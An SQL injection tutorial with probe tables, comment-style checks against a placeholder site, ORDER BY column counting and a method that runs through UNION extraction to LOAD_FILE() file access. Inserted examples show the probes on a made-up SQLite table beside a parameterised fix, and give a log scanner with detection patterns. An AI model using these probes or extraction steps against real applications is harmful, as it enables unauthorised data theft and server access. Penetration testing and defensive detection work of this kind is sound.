🏆 Finding the SQL injection

-------------------------------------------------------------

How to generate errors

select * from table_name where id=23
select * from table_name where id='23'
select * from table_name where id="23"
select * from table_name where id=(23)
select * from table_name where id=('23')
select * from table_name where id=("23")

❗ IMPORTANT

Remember: whenever the input is enclosed in single quotes, only a single quote in the input will create an error.

When the input is enclosed in double quotes, a double quote in the input will give an error.

When the input is not enclosed in anything, a single quote and a double quote will both give an error.

First of all, try the input with some injections to see whether you get any error. The error may not always be a real SQL error; sometimes it is a generic error or a change in the application's output. All you have to do is recognise it.
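The quoting rules above, as an added example that is not from the original page: a small Python script builds the page's query shapes over a constructed SQLite table, pastes each probe into the SQL text the way a vulnerable application would, and reports the reaction in the page's own terms (error / no output / same output / different output), next to the parameterised query that fixes the problem. Assumptions: table_name has an integer id column and a name column (placeholders); the double-quote shapes are left out because SQLite reads "..." as an identifier rather than as MySQL's string literal, and SQLite compares text to integers more strictly than MySQL, so inputs that MySQL would cast loosely (for example id='23--+') show up as "no output" here.

```python
import sqlite3

# Constructed sample data: the page's "table_name" with an integer id column.
# Assumption: the real column names are unknown, so these are placeholders.
SAMPLE_ROWS = [(23, "row-23"), (24, "row-24")]


def make_db():
    """Build an in-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table table_name (id integer, name text)")
    conn.executemany("insert into table_name values (?, ?)", SAMPLE_ROWS)
    return conn


# Query shapes from the page. Double-quote shapes are omitted: SQLite uses
# "..." for identifiers, so it does not model MySQL's "23" string literal.
TEMPLATES = {
    "integer":        "select * from table_name where id={}",
    "single_quote":   "select * from table_name where id='{}'",
    "bracket":        "select * from table_name where id=({})",
    "bracket_single": "select * from table_name where id=('{}')",
}


def vulnerable_query(conn, template, user_input):
    """The flawed pattern: the input is pasted into the SQL text.

    Returns ("rows", [...]) on success or ("error", message) when the
    pasted input leaves a quote or bracket unbalanced.
    """
    sql = template.format(user_input)
    try:
        return ("rows", conn.execute(sql).fetchall())
    except sqlite3.OperationalError as exc:  # syntax error from the DB
        return ("error", str(exc))


def safe_query(conn, user_input):
    """The fix: a bound parameter is always a value, never SQL syntax."""
    return conn.execute(
        "select * from table_name where id=?", (user_input,)
    ).fetchall()


def reaction(conn, template, user_input):
    """Summarise the result the way the page's tables do."""
    baseline = vulnerable_query(conn, template, "23")
    result = vulnerable_query(conn, template, user_input)
    if result[0] == "error":
        return "error"
    if not result[1]:
        return "no output"
    return "same output" if result == baseline else "different output"


if __name__ == "__main__":
    db = make_db()
    probes = ("23'", "23--+", "23 and 1=2", "23 or 1=1",
              "23) and 1=1--+", "23' and '1'='1", "23') and 1=1--+")
    for shape, tmpl in TEMPLATES.items():
        for probe in probes:
            print(f"{shape:15} {probe!r:22} -> {reaction(db, tmpl, probe)}")
    # The parameterised version treats the whole string as one value: no rows.
    print("parameterised:", safe_query(db, "23 or 1=1"))
```

Running the script prints one line per shape and probe; compare the column on the right with the reaction tables in the sections that follow. The "same output" rows are the ones that reveal which shape the application uses, because only a probe that balances the real quoting and bracketing leaves the query intact.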

-------------------------------------------------------------

Confirm test for a not-enclosed integer input query

Perform these tests and check the reactions of the application:

select * from table_name where id=23

Input              Reaction if it is an integer-based injection
23'                Should cause an error or no output
23"                Should cause an error or no output
23 or 1=1          Some output should come, but it may differ
23 and 1=1         Same output should come
23 and false       No output
23 and true        Same output
23--+              Same output. I used --+ to comment; later I'll show how to know which one to use
23 and true--+     Same output

-------------------------------------------------------------

Confirm test for a single-quote-enclosed integer input query

Perform these tests and check the reactions of the application:

select * from table_name where id='23'

Input              Reaction if it is a single-quote-based injection
23'                Should cause an error or no output
23"                No error, same output
23' or '1'='1      Some output should come, but it may differ
23' and '1'='1     Same output should come
23' and false--+   No output
23' and true--+    Same output

-------------------------------------------------------------

Confirm test for a double-quote-enclosed integer input query

Perform these tests and check the reactions of the application:

select * from table_name where id="23"

Input              Reaction if it is a double-quote-based injection
23'                No error, same output
23"                Should cause an error or no output
23" or "1"="1      Some output should come, but it may differ
23" and "1"="1     Same output should come
23" and false--+   No output
23" and true--+    Same output

-------------------------------------------------------------

Confirm test for a bracket-enclosed integer input query

Perform these tests and check the reactions of the application:

select * from table_name where id=(23)

Input              Reaction if it is a bracket-enclosed integer-based injection
23'                Should cause an error or no output
"                  Should cause an error or no output
23 or 1=1          Output should come, but it may differ
23 and 1=1         Output should come, but it may differ
23 and false       No output
23 and true        Same output
23--+              Error or no output. From this you can tell that a bracket is used
23)--+             Same output
23) and false--+   No output
23) and true--+    Same output

-------------------------------------------------------------

Confirm test for a bracket-enclosed single-quote integer input query

Perform these tests and check the reactions of the application:

select * from table_name where id=('23')

Input              Reaction if it is a bracket-enclosed single-quote-based injection
23'                Should cause an error or no output
23"                No error, same output
23' or '1'='1      Some output should come, but it may differ
23' and '1'='1     Some output should come, but it may differ
23' and false--+   No output or error
23' and true--+    No output or error
23') and False--+  No output
23') and true--+   Same output
23') or true--+    Output will come, but it may differ

-------------------------------------------------------------

Confirm test for a bracket-enclosed double-quote integer input query

Perform these tests and check the reactions of the application:

select * from table_name where id=("23")

Input              Reaction if it is a bracket-enclosed double-quote-based injection
23'                No error, same output
23"                Error or no output
23" or "1"="1      Some output should come, but it may differ
23" and "1"="1     Some output should come, but it may differ
23" and false--+   No output or error
23" and true--+    No output or error
23") and False--+  No output
23") and true--+   Same output
23") or true--+    Output will come, but it may differ

-------------------------------------------------------------

The error may not always be a real SQL error; sometimes it is a generic error or a change in the application's output. All you have to do is recognise it.

Error styles by backend (the page illustrates each with a screenshot that is not reproduced here):

MySQL Error Style:
MSSQL ASPX Error:
MSAccess (Apache PHP):
MSAccess (IIS ASP):
Oracle Error:
ODBC Error:
PostgreSQL Error:
MS SQL Server Error:

-------------------------------------------------------------

Different types of comments used in SQLi.

Comment    Name
--         MySQL Linux style
--+        MySQL Windows style
#          Hash (URL encode while using)
--+-       SQL comment
;%00       Null byte
`          Backtick
%23        Hash (URL encoded)
;          Used for end of query
/*         Multiple-line comment

While using # as the comment type, always remember to URL encode # to %23.

-------------------------------------------------------------

How can we check which comment to use

If the injection below gives the same output as 23 was giving, then:

http://fakesite.com/report.php?id=23--
It is an integer type injection and '--' can be used as the comment.

http://fakesite.com/report.php?id=23'--
It is a single quote type injection and '--' can be used as the comment.

http://fakesite.com/report.php?id=23"--
It is a double quote type injection and '--' can be used as the comment.

http://fakesite.com/report.php?id=23)--
It is an integer type injection with a bracket and '--' can be used as the comment.

http://fakesite.com/report.php?id=23')--
It is a single quote type injection with a bracket and '--' can be used as the comment.

http://fakesite.com/report.php?id=23")--
It is a double quote type injection with a bracket and '--' can be used as the comment.

As I showed above for the '--' comment, you can check all the comment types in the same manner. The one that gives the same output as the normal output tells you the type of the internal query along with the comment you can use.

-------------------------------------------------------------

Understand the basics of injecting:

Any time, anywhere, in any application, whenever you are injecting there are three basic rules of injecting:

  1. Balance
  2. Inject
  3. Comment

Understanding the first phase, "Balance":

In this phase we balance the internal query. After the sections above we know how to assume and figure out the internal query used by the application where the input is injected. Let's say we figured out that the internal query is "Select * from tablename where id=('23')"; in this case our balancing input should be 23').

The phase of injection:

In this phase we inject as per our requirement and the type of injection we are doing.

The phase of commenting:

Then comes the last part, commenting, which we already know. Now check the image below, which shows all three parts of an injection.

-------------------------------------------------------------

'Order By': as we know, if we give ORDER BY a number greater than the number of columns in the query, it throws an error. So we can use ORDER BY to find out how many columns the query has.

URL injection                                         Internal query                                      Output
http://fakesite.com/report.php?id=23 order by 10--+   Select * from tablename where id=23 order by 10     Error (then reduce)
http://fakesite.com/report.php?id=23 order by 1--+    Select * from tablename where id=23 order by 1      Working (then increase)
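The comment check and the ORDER BY column counting above both leave a recognisable trail in the web server's access log. As an added defender's-side example that is not part of the original page, the following Python scanner parses constructed Apache-style log lines (hypothetical traffic modelled on the page's fakesite.com URLs; the IPs, timestamps and parameter names are made up) and flags parameter values that carry the probe shapes from the tables above: a quote or bracket right after the numeric id, a comment terminator, a tautology, or an ORDER BY probe. The 500 followed by a 200 for the same value plus a comment is the server-side view of the "which comment to use" check.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed Apache-style access log lines (hypothetical, not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /report.php?id=23 HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /report.php?id=23%27 HTTP/1.1" 500 211
203.0.113.5 - - [10/Oct/2023:13:55:47 +0000] "GET /report.php?id=23%27-- HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:55:52 +0000] "GET /report.php?id=23%20order%20by%2010--%2B HTTP/1.1" 500 211
203.0.113.5 - - [10/Oct/2023:13:56:03 +0000] "GET /report.php?id=23%23 HTTP/1.1" 200 512
198.51.100.7 - - [10/Oct/2023:13:56:10 +0000] "GET /report.php?id=24 HTTP/1.1" 200 498
198.51.100.7 - - [10/Oct/2023:13:56:12 +0000] "GET /search.php?q=rock%20n%27%20roll HTTP/1.1" 200 300
"""

# Common log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Probe shapes taken from the page's tables. They are matched against the
# URL-decoded parameter value, so %27, %23 and %00 are seen as ' # and NUL.
PROBES = [
    ("quote_after_number", re.compile(r"^\s*\d+\s*['\")]")),
    ("sql_comment",        re.compile(r"--|#|/\*|;\x00")),
    ("tautology",          re.compile(
        r"\b(or|and)\s+(true|false|1\s*=\s*1|'1'\s*=\s*'1|\"1\"\s*=\s*\"1)", re.I)),
    ("order_by_probe",     re.compile(r"\border\s+by\s+\d+", re.I)),
]


def scan_line(line):
    """Return a finding dict for a suspicious request, or None for a clean one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m["target"]).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        for label, rx in PROBES:
            if rx.search(value):
                hits.append((name, label))
    if not hits:
        return None
    return {
        "ip": m["ip"],
        "time": m["ts"],
        "status": m["status"],
        "target": unquote_plus(m["target"]),
        "hits": hits,
    }


def scan_log(text):
    """Scan every line and keep only the findings."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]


def probes_by_ip(findings):
    """Count flagged requests per client: repeated probes from one source
    are the signal that someone is walking through the tables above."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        labels = ", ".join(f"{name}:{label}" for name, label in f["hits"])
        print(f'{f["ip"]} {f["status"]} {f["target"]}  [{labels}]')
    print(probes_by_ip(found))
```

The benign apostrophe in search.php?q=rock n' roll is not flagged because the quote does not directly follow a number and no comment or tautology accompanies it; tune the patterns to the application's own parameters rather than alerting on every quote.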

-------------------------------------------------------------

Methodology

SQL Injection points:

  • In the parameter field (ex: page.php?login=<payload>)

  • Directly in a parameter (ex: page.php?<payload>=...)

  • In the path (ex: page<payload>/)

  • In the header (user-agent:, referer:, cookies:)

-------------------------------------------------------------

Method 1:

  1. Attempt to generate an error with an invalid input or a special character indicating the presence of an injection possibility

  2. Find the total number of columns in the table with the "ORDER BY" and "GROUP BY" commands

  3. Find vulnerable columns with "UNION" operators

  4. Extract basic information such as database(), version(), user(), uuid() with "CONCAT()" or "GROUP_CONCAT()"

  5. Extract the complete tables with the column names (extract as much information as possible with the "GROUP_CONCAT()" command)

  6. Check file privileges with "file_priv"

  7. Access the system with the "LOAD_FILE()" command

-------------------------------------------------------------
